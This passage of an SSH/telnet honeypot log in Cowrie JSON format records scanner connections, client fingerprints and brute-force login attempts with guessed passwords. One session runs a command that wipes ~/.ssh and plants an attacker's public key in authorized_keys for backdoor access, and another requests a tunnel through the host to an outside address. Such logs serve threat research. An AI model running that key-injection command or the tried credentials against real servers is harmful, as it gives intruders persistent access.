m@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:47:14.197130Z","src_ip":"103.12.154.87","session":"0bd956198afe"}
{"eventid":"cowrie.login.failed","username":"user1","password":"abc123","message":"login attempt [user1/abc123] failed","sensor":"my-vps","timestamp":"2025-08-26T06:47:17.056933Z","src_ip":"103.12.154.87","session":"0bd956198afe"}
{"eventid":"cowrie.session.closed","duration":"4.4","message":"Connection lost after 4.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:47:18.326303Z","src_ip":"103.12.154.87","session":"0bd956198afe"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36228,"dst_ip":"1.2.3.4","dst_port":22,"session":"54df82a0a78c","protocol":"ssh","message":"New connection: 212.227.235.229:36228 (1.2.3.4:22) [session: 54df82a0a78c]","sensor":"my-vps","timestamp":"2025-08-26T06:47:29.978167Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:47:29.992571Z","src_ip":"212.227.235.229","session":"54df82a0a78c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:47:30.260988Z","src_ip":"212.227.235.229","session":"54df82a0a78c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":50312,"dst_ip":"1.2.3.4","dst_port":23,"session":"3c2e554a11da","protocol":"telnet","message":"New connection: 212.227.235.229:50312 (1.2.3.4:23) [session: 3c2e554a11da]","sensor":"my-vps","timestamp":"2025-08-26T06:47:30.291345Z"}
{"eventid":"cowrie.login.failed","username":"chirag","password":"chirag","message":"login attempt [chirag/chirag] failed","sensor":"my-vps","timestamp":"2025-08-26T06:47:31.439945Z","src_ip":"212.227.235.229","session":"54df82a0a78c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":44249,"dst_ip":"1.2.3.4","dst_port":22,"session":"db1f975e47a1","protocol":"ssh","message":"New connection: 212.227.235.229:44249 (1.2.3.4:22) [session: db1f975e47a1]","sensor":"my-vps","timestamp":"2025-08-26T06:47:31.666384Z"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37346,"dst_ip":"1.2.3.4","dst_port":22,"session":"1d21239f7f39","protocol":"ssh","message":"New connection: 212.227.235.229:37346 (1.2.3.4:22) [session: 1d21239f7f39]","sensor":"my-vps","timestamp":"2025-08-26T06:48:01.576439Z"}
{"eventid":"cowrie.session.closed","duration":31.3020179271698,"message":"Connection lost after 31 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:01.592932Z","src_ip":"212.227.235.229","session":"3c2e554a11da"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:48:02.202714Z","src_ip":"212.227.235.229","session":"1d21239f7f39"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-26T06:48:02.214718Z","src_ip":"212.227.235.229","session":"1d21239f7f39"}
{"eventid":"cowrie.login.success","username":"root","password":"Lakshin@123","message":"login attempt [root/Lakshin@123] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:48:04.603332Z","src_ip":"212.227.235.229","session":"1d21239f7f39"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:05.097179Z","src_ip":"212.227.235.229","session":"1d21239f7f39"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":48748,"dst_ip":"1.2.3.4","dst_port":22,"session":"a42bacd70eda","protocol":"ssh","message":"New connection: 103.12.154.87:48748 (1.2.3.4:22) [session: a42bacd70eda]","sensor":"my-vps","timestamp":"2025-08-26T06:48:30.402847Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:48:30.407018Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:48:30.635803Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.login.success","username":"root","password":"12345678.","message":"login attempt [root/12345678.] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:48:32.281331Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:48:32.813571Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:48:32.814292Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T06:48:32.815652Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:33.016604Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T06:48:33.959522Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T06:48:33.960238Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T06:48:34.194130Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:34.195061Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":50354,"dst_ip":"1.2.3.4","dst_port":22,"session":"5f2a2318da68","protocol":"ssh","message":"New connection: 103.12.154.87:50354 (1.2.3.4:22) [session: 5f2a2318da68]","sensor":"my-vps","timestamp":"2025-08-26T06:48:34.414027Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:48:34.415082Z","src_ip":"103.12.154.87","session":"5f2a2318da68"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:48:34.644009Z","src_ip":"103.12.154.87","session":"5f2a2318da68"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T06:48:35.562639Z","src_ip":"103.12.154.87","session":"5f2a2318da68"}
{"eventid":"cowrie.session.closed","duration":"2.4","message":"Connection lost after 2.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:36.783654Z","src_ip":"103.12.154.87","session":"5f2a2318da68"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":51312,"dst_ip":"1.2.3.4","dst_port":22,"session":"aede40455c30","protocol":"ssh","message":"New connection: 103.12.154.87:51312 (1.2.3.4:22) [session: aede40455c30]","sensor":"my-vps","timestamp":"2025-08-26T06:48:37.001241Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:48:37.003641Z","src_ip":"103.12.154.87","session":"aede40455c30"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T06:48:37.224817Z","src_ip":"103.12.154.87","session":"aede40455c30"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:48:38.776558Z","src_ip":"103.12.154.87","session":"aede40455c30"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:39.001728Z","src_ip":"103.12.154.87","session":"a42bacd70eda"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:48:39.003029Z","src_ip":"103.12.154.87","session":"aede40455c30"}
{"eventid":"cowrie.session.connect","src_ip":"116.196.70.63","src_port":51904,"dst_ip":"1.2.3.4","dst_port":22,"session":"26178a2d310f","protocol":"ssh","message":"New connection: 116.196.70.63:51904 (1.2.3.4:22) [session: 26178a2d310f]","sensor":"my-vps","timestamp":"2025-08-26T06:49:03.881202Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:49:03.882581Z","src_ip":"116.196.70.63","session":"26178a2d310f"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-26T06:49:04.087528Z","src_ip":"116.196.70.63","session":"26178a2d310f"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:11.881302Z","src_ip":"116.196.70.63","session":"26178a2d310f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30556,"dst_ip":"1.2.3.4","dst_port":22,"session":"cd8c81d4325e","protocol":"ssh","message":"New connection: 212.227.125.160:30556 (1.2.3.4:22) [session: cd8c81d4325e]","sensor":"my-vps","timestamp":"2025-08-26T06:49:24.380985Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:24.382256Z","src_ip":"212.227.125.160","session":"cd8c81d4325e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":30843,"dst_ip":"1.2.3.4","dst_port":22,"session":"085b6d208cde","protocol":"ssh","message":"New connection: 212.227.125.160:30843 (1.2.3.4:22) [session: 085b6d208cde]","sensor":"my-vps","timestamp":"2025-08-26T06:49:24.494584Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T06:49:24.495643Z","src_ip":"212.227.125.160","session":"085b6d208cde"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-26T06:49:24.608129Z","src_ip":"212.227.125.160","session":"085b6d208cde"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T06:49:24.948271Z","src_ip":"212.227.125.160","session":"085b6d208cde"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-26T06:49:25.061880Z","session":"085b6d208cde"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:29.998744Z","src_ip":"212.227.235.229","session":"54df82a0a78c"}
{"eventid":"cowrie.session.closed","duration":"120.0","message":"Connection lost after 120.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T06:49:31.671704Z","src_ip":"212.227.235.229","session":"db1f975e47a1"}
{"eventid":"cowrie.session.connect","src_ip":"103.12.154.87","src_port":46808,"dst_ip":"1.2.3.4","dst_port":22,"session":"00c3c0101357","protocol":"ssh","message":"New connection: 103.12.154.87:46808 (1.2.3.4:22) [session: 00c3c0101357]","sensor":"my-vps","timestamp":"2025-08-26T06:49:47.572328Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T06:49:47.573635Z","src_ip":"103.12.154.87","session":"00c3c0101357"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["non